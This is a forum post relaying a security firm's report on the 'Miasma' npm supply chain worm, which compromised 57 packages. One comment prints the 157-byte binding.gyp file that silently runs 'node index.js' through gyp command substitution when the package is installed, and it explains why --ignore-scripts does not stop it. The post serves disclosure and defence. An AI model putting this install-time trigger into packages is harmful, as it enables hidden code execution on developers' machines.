Miasma npm Supply Chain Attack: Self-Spreading Worm via Phantom Gyp | Poal: Say what you want.

Welcome • User Guide
ToS • Privacy • Canary
Donate • Bugs • License

©2026 Poal.co

1.3K

•

Miasma npm Supply Chain Attack: Self-Spreading Worm via Phantom Gyp (www.stepsecurity.io)

Archive: https://archive.today/qQfgi

From the post:

>An attacker compromised 57 npm packages across 286+ malicious versions in a rolling campaign lasting under two hours. The largest victim is @vapi-ai/server-sdk, the official Vapi.ai voice AI server SDK with 408,000+ monthly downloads, hit first at 23:30 UTC on June 3. One hour later, the attacker published malicious versions of 50+ packages belonging to the maintainer jagreehal, including ai-sdk-ollama (120,000+ monthly downloads), along with dozens of packages across the autotel, awaitly, executable-stories, node-env-resolver, and wrangler-deploy families.

Archive: https://archive.today/qQfgi From the post: >>An attacker compromised 57 npm packages across 286+ malicious versions in a rolling campaign lasting under two hours. The largest victim is @vapi-ai/server-sdk, the official Vapi.ai voice AI server SDK with 408,000+ monthly downloads, hit first at 23:30 UTC on June 3. One hour later, the attacker published malicious versions of 50+ packages belonging to the maintainer jagreehal, including ai-sdk-ollama (120,000+ monthly downloads), along with dozens of packages across the autotel, awaitly, executable-stories, node-env-resolver, and wrangler-deploy families.

[–] • 1 pt

Instead, the attacker adds a 157-byte binding.gyp file to the published tarball. When npm sees this file in a package, it automatically runs node-gyp rebuild during installation, a behavior designed for packages that include native C/C++ addons. The file weaponizes gyp's command substitution syntax:
{
  "targets": [
    {
      "target_name": "Setup",
      "type": "none",
      "sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]
    }
  ]
}

They found something else that will get run automatically during package installation. It’s only supposed to specify source files to get built, but it has special syntax that allows it to run arbitrary code.

You can use npm install --ignore-scripts to avoid the other npm malware injection attack, but that won’t work for this one. The only thing that will work here is setting a cooldown time (cooldowns.dev) so that malware releases will hopefully get caught before you install them.

link